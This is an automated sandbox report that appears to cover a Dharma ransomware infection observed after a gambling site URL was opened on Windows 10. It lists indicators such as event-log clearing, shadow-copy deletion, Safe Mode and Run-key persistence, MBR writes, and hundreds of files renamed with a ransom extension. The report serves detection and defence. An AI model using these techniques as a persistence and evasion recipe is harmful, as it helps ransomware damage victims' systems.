Resubmissions
05/03/2025, 18:11
250305-wss11avxav 1005/03/2025, 18:06
250305-wprzjavrz9 405/03/2025, 17:59
250305-wkxdfsvvfy 305/03/2025, 17:55
250305-whs81svvdw 305/03/2025, 17:45
250305-wb6wjavtev 805/03/2025, 17:30
250305-v3dhmat1ht 1005/03/2025, 17:26
250305-vzwj2at1c1 305/03/2025, 17:07
250305-vm2khstsax 1005/03/2025, 17:04
250305-vlb88ss1gs 305/03/2025, 16:25
250305-txctgasrs8 8Analysis
-
max time kernel
819s -
max time network
979s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
05/03/2025, 17:07
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
http://melbet.com
Resource
win10v2004-20250217-en
Behavioral task
behavioral2
Sample
http://melbet.com
Resource
win11-20250218-en
General
-
Target
http://melbet.com
Malware Config
Signatures
-
Dharma
Dharma is a ransomware that uses security software installation to hide malicious activities.
-
Dharma family
-
Clears Windows event logs 1 TTPs 64 IoCs
pid Process 11060 wevtutil.exe 8632 wevtutil.exe 10004 Process not Found 10672 wevtutil.exe 9348 wevtutil.exe 11792 wevtutil.exe 7308 wevtutil.exe 8604 wevtutil.exe 11180 wevtutil.exe 9448 Process not Found 6296 Process not Found 11792 wevtutil.exe 2468 wevtutil.exe 7032 wevtutil.exe 6208 wevtutil.exe 11168 wevtutil.exe 3728 wevtutil.exe 10040 wevtutil.exe 5996 Process not Found 4840 wevtutil.exe 12284 Process not Found 8928 wevtutil.exe 9732 wevtutil.exe 3648 wevtutil.exe 11244 wevtutil.exe 11388 wevtutil.exe 10340 wevtutil.exe 9840 wevtutil.exe 8088 wevtutil.exe 7592 wevtutil.exe 8696 wevtutil.exe 7052 wevtutil.exe 10832 Process not Found 10588 Process not Found 7332 wevtutil.exe 6684 wevtutil.exe 5128 wevtutil.exe 6744 wevtutil.exe 12248 wevtutil.exe 11936 wevtutil.exe 10920 Process not Found 6780 Process not Found 11144 wevtutil.exe 10628 wevtutil.exe 11040 wevtutil.exe 7668 wevtutil.exe 8176 wevtutil.exe 11824 wevtutil.exe 7004 Process not Found 8148 Process not Found 9552 wevtutil.exe 3360 Process not Found 9944 Process not Found 11892 wevtutil.exe 6512 wevtutil.exe 5356 Process not Found 6348 Process not Found 8004 wevtutil.exe 6372 wevtutil.exe 4840 wevtutil.exe 11620 wevtutil.exe 10692 Process not Found 8908 Process not Found 9708 wevtutil.exe -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs
Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.
pid Process 8896 net.exe 7796 net1.exe -
Renames multiple (716) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Disables Task Manager via registry modification
-
Sets service image path in registry 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssql\ImagePath = "\\??\\C:\\Users\\Admin\\Documents\\Dharma\\mssql.sys" mssql.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\sxwkiyeefcobuzdfb\ImagePath = "\\??\\C:\\Users\\Admin\\Documents\\Dharma\\sxwkiyeefcobuzdfb.sys" mssql.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\erexdgzqeuzcpc\ImagePath = "\\??\\C:\\Users\\Admin\\Documents\\Dharma\\erexdgzqeuzcpc.sys" mssql.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\agruzawdrtcynl\ImagePath = "\\??\\C:\\Users\\Admin\\Documents\\Dharma\\agruzawdrtcynl.sys" mssql.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\pverubcretemktj\ImagePath = "\\??\\C:\\Users\\Admin\\Documents\\Dharma\\pverubcretemktj.sys" mssql.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssqlaq\ImagePath = "\\??\\C:\\Users\\Admin\\Documents\\Dharma\\mssqlaq.sys" mssql.exe -
Checks computer location settings 2 TTPs 17 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation unlocker.tmp Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation LogDelete.exe Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation 1sass.exe Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation loader.exe -
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Drops startup file 5 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-F6ED3317.[[email protected]].ROGER 1sass.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-F6ED3317.[[email protected]].ROGER 1sass.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta 1sass.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1sass.exe 1sass.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini 1sass.exe -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 33 IoCs
pid Process 3036 1sass.exe 3684 mssql2.exe 1436 nc123.exe 3904 mssql.exe 6172 SearchHost.exe 6768 unlocker.exe 7752 unlocker.tmp 8640 LogDelete.exe 8080 loader.exe 6484 MouseLock.exe 2512 Process not Found 10600 Process not Found 8204 Process not Found 9980 Process not Found 11340 Process not Found 9472 Process not Found 10512 Process not Found 10540 Process not Found 11128 Process not Found 7236 Process not Found 7488 Process not Found 8384 Process not Found 5860 Process not Found 7936 Process not Found 3648 Process not Found 8636 Process not Found 7588 Process not Found 9712 Process not Found 7732 Process not Found 11208 Process not Found 8484 Process not Found 5384 Process not Found 8376 Process not Found -
Impair Defenses: Safe Mode Boot 1 TTPs 8 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\erexdgzqeuzcpc.sys mssql.exe Key deleted \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\EREXDGZQEUZCPC.SYS mssql.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\agruzawdrtcynl.sys mssql.exe Key deleted \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\AGRUZAWDRTCYNL.SYS mssql.exe Key deleted \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\PVERUBCRETEMKTJ.SYS mssql.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\pverubcretemktj.sys mssql.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\sxwkiyeefcobuzdfb.sys mssql.exe Key deleted \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\SXWKIYEEFCOBUZDFB.SYS mssql.exe -
Loads dropped DLL 24 IoCs
pid Process 7752 unlocker.tmp 2512 Process not Found 11052 Process not Found 3332 Process not Found 10600 Process not Found 11340 Process not Found 9472 Process not Found 9472 Process not Found 10540 Process not Found 10540 Process not Found 7236 Process not Found 7488 Process not Found 5860 Process not Found 8384 Process not Found 7936 Process not Found 8636 Process not Found 3648 Process not Found 7588 Process not Found 9712 Process not Found 7732 Process not Found 11208 Process not Found 8484 Process not Found 5384 Process not Found 8376 Process not Found -
Modifies system executable filetype association 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\UnLockerMenu Process not Found Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\UnLockerMenu\ = "{410BF280-86EF-4E0F-8279-EC5848546AD3}" Process not Found -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\C:\Users\Admin\AppData\Roaming\Info.hta = "mshta.exe \"C:\\Users\\Admin\\AppData\\Roaming\\Info.hta\"" 1sass.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1sass.exe = "C:\\Windows\\System32\\1sass.exe" 1sass.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\C:\Windows\System32\Info.hta = "mshta.exe \"C:\\Windows\\System32\\Info.hta\"" 1sass.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 64 IoCs
description ioc Process File opened for modification C:\Program Files\desktop.ini 1sass.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini 1sass.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini 1sass.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini 1sass.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini 1sass.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini 1sass.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini 1sass.exe File opened for modification C:\Users\Admin\Searches\desktop.ini 1sass.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI 1sass.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini 1sass.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini 1sass.exe File opened for modification C:\Users\Public\Videos\desktop.ini 1sass.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\desktop.ini 1sass.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini 1sass.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini 1sass.exe File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini 1sass.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini 1sass.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini 1sass.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini 1sass.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini 1sass.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini 1sass.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini 1sass.exe File opened for modification C:\Users\Admin\Documents\desktop.ini 1sass.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini 1sass.exe File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini 1sass.exe File opened for modification C:\Users\Public\AccountPictures\desktop.ini 1sass.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini 1sass.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini 1sass.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini 1sass.exe File opened for modification C:\Users\Public\Pictures\desktop.ini 1sass.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini 1sass.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini 1sass.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-2593460650-190333679-3676257533-1000\desktop.ini 1sass.exe File opened for modification C:\Program Files (x86)\desktop.ini 1sass.exe File opened for modification C:\Users\Admin\3D Objects\desktop.ini 1sass.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini 1sass.exe File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini 1sass.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini 1sass.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini 1sass.exe File opened for modification C:\Users\Admin\Videos\desktop.ini 1sass.exe File opened for modification C:\$Recycle.Bin\S-1-5-21-2593460650-190333679-3676257533-1000\desktop.ini 1sass.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini 1sass.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini 1sass.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini 1sass.exe File opened for modification C:\Users\Public\Libraries\desktop.ini 1sass.exe File opened for modification C:\Users\Public\Music\desktop.ini 1sass.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini 1sass.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini 1sass.exe File opened for modification C:\Users\Public\desktop.ini 1sass.exe File opened for modification C:\Users\Public\Documents\desktop.ini 1sass.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini 1sass.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini 1sass.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini 1sass.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini 1sass.exe File opened for modification C:\Users\Admin\Music\desktop.ini 1sass.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini 1sass.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini 1sass.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini 1sass.exe File opened for modification C:\Users\Public\Desktop\desktop.ini 1sass.exe File opened for modification C:\Users\Public\Downloads\desktop.ini 1sass.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini 1sass.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini 1sass.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini 1sass.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini 1sass.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\D: SearchHost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 354 drive.google.com 355 drive.google.com 349 camo.githubusercontent.com 353 drive.google.com -
Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
-
Power Settings 1 TTPs 1 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 8396 wevtutil.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 Process not Found -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x003f00000002356e-11139.dat autoit_exe behavioral1/files/0x00070000000248c3-11082.dat autoit_exe -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\System32\1sass.exe 1sass.exe File created C:\Windows\System32\Info.hta 1sass.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\onboarding\landing_page_whats_new_v1.png 1sass.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\ja\System.Windows.Forms.Primitives.resources.dll 1sass.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\Close2x.png.id-F6ED3317.[[email protected]].ROGER 1sass.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\api-ms-win-core-synch-l1-2-0.dll 1sass.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\BORDERS\MSART3.BDR.id-F6ED3317.[[email protected]].ROGER 1sass.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\demux\libogg_plugin.dll.id-F6ED3317.[[email protected]].ROGER 1sass.exe File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\it\Microsoft.PackageManagement.MetaProvider.PowerShell.resources.dll.id-F6ED3317.[[email protected]].ROGER 1sass.exe File created C:\Program Files\7-Zip\Lang\gl.txt.id-F6ED3317.[[email protected]].ROGER 1sass.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN010.XML 1sass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\Assets\MixedRealityPortalSplashScreen.scale-200.png 1sass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-24_altform-unplated_contrast-black.png 1sass.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\remove.svg 1sass.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\Locales\ro.pak 1sass.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\System.Windows.Forms.Design.Editors.dll 1sass.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\wsdetect.dll 1sass.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\Info.png.id-F6ED3317.[[email protected]].ROGER 1sass.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019VL_KMS_Client_AE-ul.xrm-ms 1sass.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TRANSLAT\ENES\MSB1ENES.ITS.id-F6ED3317.[[email protected]].ROGER 1sass.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\ml.pak.DATA.id-F6ED3317.[[email protected]].ROGER 1sass.exe File opened for modification C:\Program Files\Microsoft Office\root\Integration\C2RManifest.office32mui.msi.16.en-us.xml 1sass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-white\WideTile.scale-400_contrast-white.png 1sass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Services.Store.Engagement_10.0.18101.0_x64__8wekyb3d8bbwe\logo.png 1sass.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\ext\sunjce_provider.jar.id-F6ED3317.[[email protected]].ROGER 1sass.exe File created C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.contrast-white_scale-140.png.id-F6ED3317.[[email protected]].ROGER 1sass.exe File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\chrome_pwa_launcher.exe 1sass.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_OEM_Perp5-ul-phn.xrm-ms.id-F6ED3317.[[email protected]].ROGER 1sass.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProCO365R_SubTest-ul-oob.xrm-ms.id-F6ED3317.[[email protected]].ROGER 1sass.exe File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\pt-BR\Microsoft.VisualBasic.Forms.resources.dll.id-F6ED3317.[[email protected]].ROGER 1sass.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\japanese_over.png 1sass.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TRANSLAT\MSB1XTOR.DLL.id-F6ED3317.[[email protected]].ROGER 1sass.exe File opened for modification C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\System.AddIn.Contract.dll 1sass.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarAppList.targetsize-60_altform-unplated.png 1sass.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ja-jp\ui-strings.js.id-F6ED3317.[[email protected]].ROGER 1sass.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\images\cursors\cursors.properties.id-F6ED3317.[[email protected]].ROGER 1sass.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ONLNTCOMLIB.DLL.id-F6ED3317.[[email protected]].ROGER 1sass.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\es-419.pak.DATA.id-F6ED3317.[[email protected]].ROGER 1sass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.targetsize-36.png 1sass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\stickers\word_art\sticker33.png 1sass.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\PreviewMailList.png 1sass.exe File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\PresentationUI.dll.id-F6ED3317.[[email protected]].ROGER 1sass.exe File created C:\Program Files\Microsoft Office\root\Office16\ADDINS\MSOSEC.DLL.id-F6ED3317.[[email protected]].ROGER 1sass.exe File opened for modification C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\es\System.Data.Linq.Resources.dll 1sass.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi420_yuy2_plugin.dll 1sass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exe 1sass.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\mscorrc.dll 1sass.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\GenericMailBadge.scale-150.png 1sass.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\zh-Hans\System.Windows.Forms.Design.resources.dll 1sass.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\offsymxb.ttf 1sass.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.el-gr.dll.id-F6ED3317.[[email protected]].ROGER 1sass.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\hostpolicy.dll.id-F6ED3317.[[email protected]].ROGER 1sass.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL109.XML 1sass.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\cs-cz\ui-strings.js.id-F6ED3317.[[email protected]].ROGER 1sass.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Trust Protection Lists\Mu\Cryptomining.DATA.id-F6ED3317.[[email protected]].ROGER 1sass.exe File created C:\Program Files\7-Zip\Lang\co.txt.id-F6ED3317.[[email protected]].ROGER 1sass.exe File created C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000049\StoreLogo.png.id-F6ED3317.[[email protected]].ROGER 1sass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\jsaddins\onenote-winrt-16.00.js 1sass.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Runtime.Loader.dll.id-F6ED3317.[[email protected]].ROGER 1sass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubAppList.targetsize-32_altform-unplated_contrast-white.png 1sass.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ca-es\ui-strings.js.id-F6ED3317.[[email protected]].ROGER 1sass.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\fr-fr\ui-strings.js.id-F6ED3317.[[email protected]].ROGER 1sass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\FileExtension.targetsize-63.png 1sass.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp3-ul-phn.xrm-ms.id-F6ED3317.[[email protected]].ROGER 1sass.exe File opened for modification C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\ja\System.Data.Services.resources.dll 1sass.exe File created C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected].[[email protected]].ROGER 1sass.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nc123.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened 